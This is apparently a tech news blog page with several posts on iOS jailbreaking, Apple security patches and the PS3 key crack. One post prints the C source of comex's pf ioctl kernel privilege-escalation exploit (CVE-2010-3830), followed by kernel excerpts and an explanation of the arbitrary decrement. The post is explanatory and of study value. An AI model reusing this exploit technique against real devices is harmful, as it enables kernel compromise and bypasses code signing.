September 1, 2014

JailBreakMe 3.0 Source Code Released

(LiveHacking.Com)  Apple released iOS 4.3.4 a few days ago to close a vulnerability which allowed iOS devices to be jailbroken using a specially crafted PDF file. The most successful exploit of this hole was the JailBreakMe 3.0 web site which allowed users to jailbreak their iOS devices by visiting the site and downloading a PDF.

Comex the developer of the JailBreakMe 3.0 system has now released the source code to the system and so provide students and security professionals a valuable resource to study, learn and understand the nature of iOS jail breaking and in paticular PDF exploits.

Hosted by GitHub, a web-based source code repository that uses Git for revision control, the system is made up from a collection of higher level python code to manage the jailbreak (creation of the FreeType exploit file, packaging, delivery etc) and some low level C and assembler code to jail break the device.

Apple Releases iOS 4.3.4 to Fix Vulnerabilities – Jailbreakers Quick to React

(LiveHacking.Com) — Apple has released iOS 4.3.4 for the iPhone 3GS, the iPhone 4 (GSM model), the iPod touch (3rd generation and later) and for the iPad. The main purpose of iOS 4.3.4 is to close a hole in the PDF viewer which is used by JailBreakMe.com. It allowed users to jailbreak any iDevice (including iPad 2) through the website.

Specifically iOS 4.3.4 deals with the following security issues:

  • Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. – A buffer overflow exists in FreeType’s handling of TrueType fonts. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.
  • Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. – A signedness issue exists in FreeType’s handling of Type 1 fonts. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.
  • Malicious code running as the user may gain system privileges. – An invalid type conversion issue exists in the use of IOMobileFrameBuffer queueing primitives, which may allow malicious code running as the user to gain system privileges.
The update renders the JailBreakMe.com jail break useless. However users running 4.3.3 can still use the site to jailbreak their devices. However the Redmond Pie web site has posted details on a tethered jailbreak for iOS 4.3.4 using the PwnageTool. A tethered jailbreak means that if your device loses power or restarts then you would have to boot it into the jailbroken state again while connected to your desktop computer.

Apple iOS Networking Packet Filter Rules Local Privilege Escalation Vulnerability

Apple iOS is prone to a local privilege-escalation vulnerability. The attackers running malicious code can exploit this issue locally to elevate their privileges. The successful attacks will completely compromise an affected device.

This iPhone kernel vulnerability discovered by comex and used in the limera1n and Greenpois0n jailbreaking tools. These tools exploit a BootROM vulnerability found by geohot to get initial code execution on the device, and comex’s kernel exploit is then used to make the jailbreak untethered, i.e to persist after a reboot.

This kernel vulnerability(CVE-2010-3830) was patched with the release of iOS 4.2.1 on November 22.

Exploit Code:

int main() {
    unsigned int target_addr = CONFIG_TARGET_ADDR;
    unsigned int target_addr_real = target_addr & ~1;
    unsigned int target_pagebase = target_addr & ~0xfff;
    unsigned int num_decs = (CONFIG_SYSENT_PATCH_ORIG - target_addr) >> 24;
    assert(MAP_FAILED != mmap((void *) target_pagebase, 0x2000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0));
    unsigned short *p = (void *) target_addr_real;
    if(target_addr_real & 2) *p++ = 0x46c0; // nop
    *p++ = 0x4b00; // ldr r3, [pc]
    *p++ = 0x4718; // bx r3
    *((unsigned int *) p) = (unsigned int) &ok_go;
    assert(!mprotect((void *)target_pagebase, 0x2000, PROT_READ | PROT_EXEC));
    
    // Yes, reopening is necessary
    pffd = open("/dev/pf", O_RDWR);
    ioctl(pffd, DIOCSTOP);
    assert(!ioctl(pffd, DIOCSTART));
    unsigned int sysent_patch = CONFIG_SYSENT_PATCH;
    while(num_decs--)
        pwn(sysent_patch+3);
    assert(!ioctl(pffd, DIOCSTOP));
    close(pffd);
    
    assert(!mlock((void *) ((unsigned int)(&ok_go) & ~0xfff), 0x1000));
    assert(!mlock((void *) ((unsigned int)(&flush) & ~0xfff), 0x1000));
    assert(!mlock((void *) target_pagebase, 0x2000));
#ifdef DEBUG
    printf("ok\n"); fflush(stdout);
#endif
    syscall(0);
#ifdef DEBUG
    printf("we're out\n"); fflush(stdout);
#endif
    //...
}
//...

static void pwn(unsigned int addr) {
    struct pfioc_trans trans;
    struct pfioc_trans_e trans_e;
    struct pfioc_pooladdr pp;
    struct pfioc_rule pr;

    memset(&trans, 0, sizeof(trans));
    memset(&trans_e, 0, sizeof(trans_e));
    memset(&pr, 0, sizeof(pr));

    trans.size = 1;
    trans.esize = sizeof(trans_e);
    trans.array = &trans_e;
    trans_e.rs_num = PF_RULESET_FILTER;
    memset(trans_e.anchor, 0, MAXPATHLEN);
    assert(!ioctl(pffd, DIOCXBEGIN, &trans)); 
    u_int32_t ticket = trans_e.ticket;

    assert(!ioctl(pffd, DIOCBEGINADDRS, &pp));
    u_int32_t pool_ticket = pp.ticket;

    pr.action = PF_PASS;
    pr.nr = 0;
    pr.ticket = ticket;
    pr.pool_ticket = pool_ticket;
    memset(pr.anchor, 0, MAXPATHLEN);
    memset(pr.anchor_call, 0, MAXPATHLEN);

    pr.rule.return_icmp = 0;
    pr.rule.action = PF_PASS;
    pr.rule.af = AF_INET;
    pr.rule.proto = IPPROTO_TCP;
    pr.rule.rt = 0;
    pr.rule.rpool.proxy_port[0] = htons(1);
    pr.rule.rpool.proxy_port[1] = htons(1);

    pr.rule.src.addr.type = PF_ADDR_ADDRMASK;
    pr.rule.dst.addr.type = PF_ADDR_ADDRMASK;
    
    //offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) = 0x4a4
    pr.rule.overload_tbl = (void *)(addr - 0x4a4);
    
    errno = 0;

    assert(!ioctl(pffd, DIOCADDRULE, &pr));

    assert(!ioctl(pffd, DIOCXCOMMIT, &trans));

    pr.action = PF_CHANGE_REMOVE;
    assert(!ioctl(pffd, DIOCCHANGERULE, &pr));
}

########################################################################################################
The vulnerability is located in the DIOCADDRULE ioctl handler, due to improper initialization of the overload_tbl field, which can be later exploited in the DIOCCHANGERULE handler. The following code snippet shows the relevant parts of those handlers :
########################################################################################################

//bsd/net/pf_ioctl.c
static int
pfioctl(dev_t dev, u_long cmd, caddr_t addr, int flags, struct proc *p)
{
    //...
    switch (cmd) {
    //...
    case DIOCADDRULE: {
        struct pfioc_rule    *pr = (struct pfioc_rule *)addr;
        struct pf_ruleset    *ruleset;
        
        //...
        
        //copy structure passed from userspace
        bcopy(&pr->rule, rule, sizeof (struct pf_rule));
        rule->cuid = kauth_cred_getuid(p->p_ucred);
        rule->cpid = p->p_pid;
        rule->anchor = NULL;
        rule->kif = NULL;
        TAILQ_INIT(&rule->rpool.list);
        /* initialize refcounting */
        rule->states = 0;
        rule->src_nodes = 0;
        rule->entries.tqe_prev = NULL;
        
        //...
        
        if (rule->overload_tblname[0]) {
            if ((rule->overload_tbl = pfr_attach_table(ruleset,
                rule->overload_tblname)) == NULL)
                error = EINVAL;
            else
                rule->overload_tbl->pfrkt_flags |=
                    PFR_TFLAG_ACTIVE;
        }
        //...

    case DIOCCHANGERULE: {
        //...
        if (pcr->action == PF_CHANGE_REMOVE) {
            pf_rm_rule(ruleset->rules[rs_num].active.ptr, oldrule);
            ruleset->rules[rs_num].active.rcount--;
        }
        //...
    }

    //...
}
################################################################################################ 
The rule field of the pfioc_rule structure passed from userland is copied into a kernel buffer, and then some of the structure fields are reinitialized. However, if rule->overload_tblname[0] is zero, the rule->overload_tbl pointer won't be initialized properly and will retain the value passed from userland. When the rule is removed, the pf_rm_rule function calls pfr_detach_table which in turn decrements a reference counter using the invalid pointer, allowing an arbitrary decrement anywhere in kernel memory :
##############################################################################################
//bsd/net/pf_ioctl.c
void
pf_rm_rule(struct pf_rulequeue *rulequeue, struct pf_rule *rule)
{
    if (rulequeue != NULL) {
        if (rule->states <= 0) {
            /*
             * XXX - we need to remove the table *before* detaching
             * the rule to make sure the table code does not delete
             * the anchor under our feet.
             */
            pf_tbladdr_remove(&rule->src.addr);
            pf_tbladdr_remove(&rule->dst.addr);
            if (rule->overload_tbl)
                pfr_detach_table(rule->overload_tbl);
        }
    //...
}


//bsd/net/pf_table.c
void
pfr_detach_table(struct pfr_ktable *kt)
{
    lck_mtx_assert(pf_lock, LCK_MTX_ASSERT_OWNED);

    if (kt->pfrkt_refcnt[PFR_REFCNT_RULE] <= 0)
        printf("pfr_detach_table: refcount = %d.\n",
            kt->pfrkt_refcnt[PFR_REFCNT_RULE]);
    else if (!--kt->pfrkt_refcnt[PFR_REFCNT_RULE]) //arbitrary decrement happens here
        pfr_setflags_ktable(kt, kt->pfrkt_flags&~PFR_TFLAG_REFERENCED);
}

###############################################################################################
In order to decrement the dword at address addr, the pwn function of comex's exploit sets the pr.rule.overload_tbl to addr minus 0x4a4, which is the value of offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) on a 32 bit architecture. The exploit decrement the syscall 0 handler address in the sysent array which holds function pointers for all system calls. A trampoline shellcode is mapped at a specific address chosen so that only the most significant byte of the original pointer has to be decremented (the minimum amount to move the pointer from kernel space down to user space). This trampoline will simply call the ok_go C function which will patch various functions in the kernel to perform the jailbreak : make code signing checks return true, disable W^X policy, and restore the overwritten syscall handler.

Sources:

Hackers Hacked PlayStation 3 Systems

Hardware hackers claim to cracked the private key used by Sony to authorize code to run on PlayStation 3 systems.

According to a report by John Leyden at theregister.co.uk ,the hackers uncovered the hack in order to run Linux or PS3 consoles, irrespective of the version of firmware the games console was running. By knowing the private key used by Sony the hackers are able to sign code so that a console can boot directly into Linux. Previous approaches to running the open source OS on a games console were firmware specific and involved messing around with USB sticks.

Fail0verflow hacking group released more information about the crack during the annual Chaos Communication Conference in Berlin.

More information is available here.

What Are Your iOS Jailbreaking Options

It is rumored that there are over 10 million jailbroken Apple iOS iDevices (iPhone, iPad and iPod Touch) in existence today and for the more dedicated hacker jailbreaking your iOS device is essential.

Benefits of jailbreaking your device include greater customization options and the ability to install apps which have been rejected from Apple’s App Store including:

  • My3G: Makes apps believe that they’re on Wi-Fi rather than 3G,enabling 3G-prohibited features, such as HD YouTube over 3G.
  • PDANet: Tethering app that will bypass the AT&T restrictions and allow you to share your internet connection.
  • MxTube: Allows you to download and save YouTube videos for offline viewing.

You can read about other apps available for jail broken devices here: http://www.gadgetsdna.com/10-ultimate-cydia-apps-for-jailbroken-iphone-4/5314/

There are three main jailbreaking tools (that working with iOS 4.2.1)at the moment: greenpois0n, redsn0w and limera1n. And all three use the same vulnerability in the device’s boot rom to crack it open. But there are some caveats:

  • Jailbreaking on the iPhone 4, later iPhone 3GS models, third generation iPod touch devices and the iPad, use what is know as tethered jailbreaking meaning that you will have to boot your device into the jailbroken state every time you reboot. What this means practically is that when you reboot the device you need to have it physically connected (tethered) to your Mac or PC with the jailbreak software running. If you reboot the device while it isn’t tethered it will boot back up without the jailbreak in place.
  • If you are trying to unlock your phone (using a tool like ultrasn0w) so that you can use any mobile phone network you need to be aware that ultrasn0w doesn’t yet work on iOS 4.2.1.

It is expected that both of the above problems will be solved in time, but there are no guarantees as to when.

For those who want to try this out, here is a video tutorial on jailbreaking an iPhone running iOS 4.2.1 with Redsn0w: http://www.youtube.com/watch?v=P6RJcxqFdE4&feature=player_embedded

iOS 4.2.1 Fixes Over 40 Vulnerabilities But Tools Already Out to Jailbreak All Devices

The release of iOS 4.2.1 for the iPad, iPhone and iPod Touch was important not only for the new features like multitasking and folders for the iPad, and AirPlay & AirPrint for all iDevices, but also because it plugged over 40 security holes in the OS.

Most of the vulnerabilities (at least 27) are within the Safari WebKit-based browser engine, these holes had previously left iOS open to remote code execution attacks, which means that victims needed only to visit a specially crafted web site to be infected with malware.

It is essential for all iDevice users to update to iOS 4.2.1 as soon as possible to remain safe and secure while using their devices for web browsing.

However, it hasn’t taken long for hackers to jailbreak this new version of iOS. It is now being reported that the Redsn0w jailbreak is already live for iOS 4.2.1 on all devices (including the iPad). The current range of jailbreaking tools all use a vulnerability in the boot rom, which can’t be fixed by a software patch (only shipping new devices with a new boot rom will close the hole). In short this means that all all iOS devices are capable of being jailbroken using this same single method.

But with iOS 4.2.1 fresh out of the door, peculation has already begun about version iOS 4.3. The whispers are that 4.3 could be out during December and add app subscriptions, which would allow recurring charges for magazine publishers and other periodical content providers.